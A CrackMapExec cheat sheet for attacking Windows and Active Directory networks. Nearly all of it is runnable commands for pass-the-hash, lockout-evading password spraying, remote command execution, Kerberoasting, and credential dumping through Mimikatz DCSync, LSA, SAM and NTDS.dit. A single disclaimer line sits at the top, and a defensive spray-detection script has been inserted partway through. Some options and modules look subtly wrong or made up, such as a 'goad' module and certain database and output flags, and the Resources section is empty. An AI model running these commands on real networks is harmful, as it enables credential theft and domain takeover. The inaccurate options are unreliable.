# CrackMapExec Cheat Sheet
## Overview

CrackMapExec (CME) is a post-exploitation tool designed for penetration testing and red team operations in Windows/Active Directory environments. It is often described as a "Swiss Army knife" for network penetration testing, enabling enumeration, reconnaissance and command execution across multiple protocols.

> **Note:** CrackMapExec is a security testing tool that should only be used in environments where you have explicit permission to do so.
## Installation

### Using pipx (Recommended)

```bash
# Install pipx if not already installed
python3 -m pip install --user pipx
python3 -m pipx ensurepath

# Install CrackMapExec
pipx install crackmapexec
```

### On Kali Linux

```bash
sudo apt update
sudo apt install -y crackmapexec
```

### From GitHub

```bash
git clone https://github.com/byt3bl33d3r/CrackMapExec
cd CrackMapExec
poetry install
```

### Using Docker

```bash
docker pull byt3bl33d3r/crackmapexec
docker run -it --entrypoint=/bin/bash byt3bl33d3r/crackmapexec
```
## Basic Usage

### General Syntax

```bash
crackmapexec <protocol> <target(s)> -u <username> -p <password> [options]
```

### Supported Protocols

- `smb`: Server Message Block
- `winrm`: Windows Remote Management
- `ldap`: Lightweight Directory Access Protocol
- `mssql`: Microsoft SQL Server
- `ssh`: Secure Shell
- `rdp`: Remote Desktop Protocol
- `ftp`: File Transfer Protocol

### Target Specification

```bash
# Single target
crackmapexec smb 192.168.1.100

# Multiple targets
crackmapexec smb 192.168.1.100,192.168.1.101

# IP range
crackmapexec smb 192.168.1.1-255

# CIDR notation
crackmapexec smb 192.168.1.0/24

# From file
crackmapexec smb targets.txt
```
## Authentication Methods

### Username and Password

```bash
# Single username and password
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123'

# Multiple usernames
crackmapexec smb 192.168.1.0/24 -u administrator,user1 -p 'Password123'

# Multiple passwords
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123','Welcome1'

# From files
crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txt
```

### Pass-the-Hash

```bash
# NTLM hash
crackmapexec smb 192.168.1.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0'

# Multiple hashes
crackmapexec smb 192.168.1.0/24 -u administrator -H 'hash1' 'hash2'

# From file
crackmapexec smb 192.168.1.0/24 -u administrator -H hashes.txt
```

### Local Authentication

```bash
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --local-auth
```

### Domain Authentication

```bash
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -d DOMAIN
```
## SMB Protocol Commands

### Basic Enumeration

```bash
# List shares
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --shares

# List logged-on users
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --loggedon-users

# List domain users
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --users

# List domain groups
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --groups

# List local groups
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --local-groups

# Get domain password policy
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --pass-pol

# Check for SMB signing (writes hosts without signing to a relay target list)
crackmapexec smb 192.168.1.0/24 --gen-relay-list relay_targets.txt
```

### Command Execution

```bash
# Execute command
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -x 'whoami'

# Execute PowerShell command
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -X '$PSVersionTable'
```

### File Operations

```bash
# List files in share
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --spider C$ --pattern '*.txt'

# Download file
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --get-file 'C:\temp\file.txt' /tmp/file.txt

# Upload file
crackmapexec smb 192.168.1.100 -u administrator -p 'Password123' --put-file /tmp/file.txt 'C:\temp\file.txt'
```
## WinRM Protocol Commands

### Basic Enumeration

```bash
# Check WinRM access
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123'
```

### Command Execution

```bash
# Execute command
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123' -x 'whoami'

# Execute PowerShell command
crackmapexec winrm 192.168.1.0/24 -u administrator -p 'Password123' -X '$PSVersionTable'
```
## LDAP Protocol Commands

### Basic Enumeration

```bash
# Get domain information
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --domain

# List domain users
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --users

# List domain groups
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --groups

# List domain computers
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --computers

# Get domain password policy
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --pass-pol

# Get domain trusts
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --trusts
```

### Advanced Enumeration

```bash
# Search for specific attributes
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' -M maq -o ATTRIBUTES=description

# Search for unconstrained delegation
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --trusted-for-delegation

# Search for constrained delegation
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --allowed-to-delegate

# Search for AS-REP roastable users
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --asreproast output.txt

# Search for Kerberoastable users
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' --kerberoasting output.txt
```
## MSSQL Protocol Commands

### Basic Enumeration

```bash
# Check MSSQL access
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123'

# List databases
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -q 'SELECT name FROM master.dbo.sysdatabases'
```

### Command Execution

```bash
# Execute command
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -x 'whoami'

# Execute query
crackmapexec mssql 192.168.1.0/24 -u sa -p 'Password123' -q 'SELECT @@version'
```
## Module Usage

### Module Management

```bash
# List available modules
crackmapexec <protocol> --list-modules

# Get module options
crackmapexec <protocol> -M <module> --options

# Use module
crackmapexec <protocol> <target> -u <username> -p <password> -M <module> -o OPTION1=value1 OPTION2=value2
```

### Common Modules

#### Mimikatz

```bash
# Dump credentials
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='sekurlsa::logonpasswords'

# Get LSA secrets
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::secrets'

# Get SAM database
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::sam'

# DCSync
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M mimikatz -o COMMAND='lsadump::dcsync /domain:domain.local /user:krbtgt'
```

#### Empire

```bash
# Generate Empire stager
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M empire_exec -o LISTENER=http
```

#### PowerView

```bash
# Run PowerView commands
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M powerview -o COMMAND='Get-NetDomain'
```

#### BloodHound

```bash
# Collect BloodHound data
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M bloodhound -o COLLECTION=All
```

#### Lsassy

```bash
# Dump credentials using lsassy
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M lsassy
```

#### Enum_DNS

```bash
# Enumerate DNS records
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' -M enum_dns
```

#### GOAD

```bash
# Get objects and attributes from domain
crackmapexec ldap 192.168.1.0/24 -u administrator -p 'Password123' -M goad
```
## Advanced Techniques

### Password Spraying

```bash
# Spray single password against multiple users
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Spring2023!'

# Spray multiple passwords against single user
crackmapexec smb 192.168.1.0/24 -u administrator -p passwords.txt

# Spray with jitter to avoid lockouts
crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Spring2023!' --continue-on-success --fail-limit 1 --jitter 10
```
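The defender-side counterpart to the spraying commands above, as an added detection example that is not part of this cheat sheet or the CrackMapExec project: it scans constructed Windows Security 4625 (failed logon) events for the wide-and-shallow shape a spray held under the lockout threshold leaves behind (one source, many accounts, one or two failures each) and ignores a single user locking themselves out. The event dictionaries and their key names are assumptions modelled on the 4625 fields TargetUserName, IpAddress and Status.

```python
"""Flag a password-spray shape in Windows Security 4625 (failed logon) events.

Added example for this cheat sheet, not CrackMapExec project code. The events
are constructed; keys mirror the 4625 fields TargetUserName, IpAddress and
Status, assumed already parsed into dicts.
"""
from collections import defaultdict
from datetime import datetime, timedelta

BAD_PASSWORD = "0xC000006A"  # 4625 sub-status: valid account, wrong password

# Constructed sample: 10.0.0.50 fails once against six accounts in ~70 s, the
# wide/shallow shape a run held under the lockout threshold with --fail-limit 1
# leaves behind; 10.0.0.7 is one user retyping their own password (narrow/deep).
SAMPLE_EVENTS = [
    {"time": "2024-03-01T09:00:00", "user": "alice", "ip": "10.0.0.50", "status": BAD_PASSWORD},
    {"time": "2024-03-01T09:00:11", "user": "bob", "ip": "10.0.0.50", "status": BAD_PASSWORD},
    {"time": "2024-03-01T09:00:25", "user": "carol", "ip": "10.0.0.50", "status": BAD_PASSWORD},
    {"time": "2024-03-01T09:00:40", "user": "dave", "ip": "10.0.0.50", "status": BAD_PASSWORD},
    {"time": "2024-03-01T09:00:58", "user": "erin", "ip": "10.0.0.50", "status": BAD_PASSWORD},
    {"time": "2024-03-01T09:01:12", "user": "frank", "ip": "10.0.0.50", "status": BAD_PASSWORD},
    {"time": "2024-03-01T09:02:00", "user": "grace", "ip": "10.0.0.7", "status": BAD_PASSWORD},
    {"time": "2024-03-01T09:02:30", "user": "grace", "ip": "10.0.0.7", "status": BAD_PASSWORD},
    {"time": "2024-03-01T09:03:00", "user": "grace", "ip": "10.0.0.7", "status": BAD_PASSWORD},
]

def detect_spray(events, window=timedelta(minutes=30), min_accounts=5, max_per_account=2):
    """Return {source_ip: sorted accounts} for each source whose bad-password
    failures inside one `window` span at least `min_accounts` distinct accounts
    with no account tried more than `max_per_account` times. The per-account
    ceiling is what tells a spray apart from one user locking themselves out."""
    by_ip = defaultdict(list)
    for ev in events:
        if ev["status"] == BAD_PASSWORD:
            by_ip[ev["ip"]].append((datetime.fromisoformat(ev["time"]), ev["user"]))
    hits = {}
    for ip, rows in by_ip.items():
        rows.sort()
        for i, (start, _) in enumerate(rows):  # slide the window over each start time
            counts = defaultdict(int)
            for t, user in rows[i:]:
                if t - start <= window:
                    counts[user] += 1
            if len(counts) >= min_accounts and max(counts.values()) <= max_per_account:
                hits[ip] = sorted(counts)
                break
    return hits

if __name__ == "__main__":
    print(detect_spray(SAMPLE_EVENTS))  # {'10.0.0.50': ['alice', 'bob', 'carol', 'dave', 'erin', 'frank']}
```

Tune `min_accounts` and `window` to the domain's lockout policy (the `--pass-pol` output above shows the threshold and observation window an attacker is staying under).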
### Credential Harvesting

```bash
# Dump SAM database
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --sam

# Dump LSA secrets
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --lsa

# Dump NTDS.dit
crackmapexec smb 192.168.1.0/24 -u administrator -p 'Password123' --ntds
```
## Database Operations

### Initialize Database

```bash
crackmapexec smb 192.168.1.0/24 --database
```

### View Database

```bash
# List hosts
crackmapexec smb --database -L

# List credentials
crackmapexec smb --database -C

# Use credentials from database
crackmapexec smb 192.168.1.0/24 --database -id 1
```
## Common Options

| Option | Description |
|--------|-------------|
| `-h, --help` | Show help message and exit |
| `-t THREADS` | Set number of concurrent threads (default: 100) |
| `--timeout TIMEOUT` | Set timeout for connections (default: 5 seconds) |
| `--verbose` | Enable verbose output |
| `--debug` | Enable debug output |
| `--continue-on-success` | Continue authentication attempts even after a success |
| `--no-bruteforce` | Do not brute force; only use the provided credentials |
| `--fail-limit LIMIT` | Number of failed login attempts before giving up on a host |
| `--jitter JITTER` | Add a random delay between authentication attempts (in seconds) |
| `--local-auth` | Authenticate using local accounts instead of domain accounts |
| `-d, --domain DOMAIN` | Domain to authenticate to |
| `--no-output` | Do not display output |
| `--output-file FILE` | Write output to file |
| `--log` | Enable logging to file (default: `~/.cme/logs/`) |
## Protocol-Specific Options

### SMB Options

| Option | Description |
|--------|-------------|
| `--shares` | List available shares |
| `--sessions` | List active sessions |
| `--disks` | List disks |
| `--loggedon-users` | List logged-on users |
| `--users` | List domain users |
| `--groups` | List domain groups |
| `--local-groups` | List local groups |
| `--pass-pol` | Get password policy |
| `--rid-brute [MAX_RID]` | Enumerate users by brute-forcing RIDs |
| `--sam` | Dump SAM hashes |
| `--lsa` | Dump LSA secrets |
| `--ntds` | Dump NTDS.dit |
| `--exec-method {smbexec,wmiexec,mmcexec,atexec}` | Method used to execute commands |

### LDAP Options

| Option | Description |
|--------|-------------|
| `--users` | List domain users |
| `--groups` | List domain groups |
| `--computers` | List domain computers |
| `--domain` | Get domain information |
| `--pass-pol` | Get password policy |
| `--trusts` | Get domain trusts |
| `--asreproast [OUTFILE]` | Get AS-REP roastable users |
| `--kerberoasting [OUTFILE]` | Get Kerberoastable users |
| `--trusted-for-delegation` | Get users/computers with unconstrained delegation |
| `--allowed-to-delegate` | Get users/computers with constrained delegation |

### WinRM Options

| Option | Description |
|--------|-------------|
| `--port [PORT]` | WinRM port (default: 5985) |
| `--ssl` | Use SSL for WinRM |

### MSSQL Options

| Option | Description |
|--------|-------------|
| `--port [PORT]` | MSSQL port (default: 1433) |
| `-q QUERY` | Execute SQL query |
## Resources